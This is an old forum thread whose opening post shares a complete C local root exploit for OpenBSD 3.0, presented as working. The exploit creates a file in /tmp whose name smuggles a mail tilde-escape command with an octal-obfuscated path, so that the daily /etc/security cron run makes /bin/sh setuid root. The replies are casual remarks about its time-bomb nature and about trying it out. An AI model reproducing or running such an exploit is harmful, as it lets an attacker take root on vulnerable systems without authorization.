|
-
April 18th, 2002, 08:01 PM
#1
OpenBSD local root exploit
Found this local root exploit for OpenBSD 3.0 works pretty well.
/*
* (c) 2002 [email protected]
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to [email protected] for discovering vulnerability.
*
*/
#include <fcntl.h>
int main(void)
{
int fd;
chdir("/tmp");
fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
if (fd)
close(fd);
}
-
April 18th, 2002, 08:54 PM
#2
Kinda reminds me of the cucus (or howerver it was spelled) egg. You set it up, then you have to wait. This one just takes a lot longer.
\"Ignorance is bliss....
but only for your enemy\"
-- souleman
-
April 18th, 2002, 10:16 PM
#3
Kind of reminds me of like a timebomb exploit/virus
-
April 19th, 2002, 04:47 AM
#4
hrm interesting that its in /etc/security...........I wonder if it will work if the permissions are set like they should be for that .............
I will have to try it out.
Antionline in a nutshell
\"You\'re putting the fate of the world in the hands of a bunch of idiots I wouldn\'t trust with a potato gun\"
Trust your Technolust
-
April 21st, 2002, 10:56 AM
#5
Hmmm... that's rather interesting... time to go look at my OpenBSD box, I guess.
Like the Octal "obfuscation" there... LOL
\"Windows has detected that a gnat has farted in the general vicinity. You must reboot for changes to take affect. Reboot now?\"
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
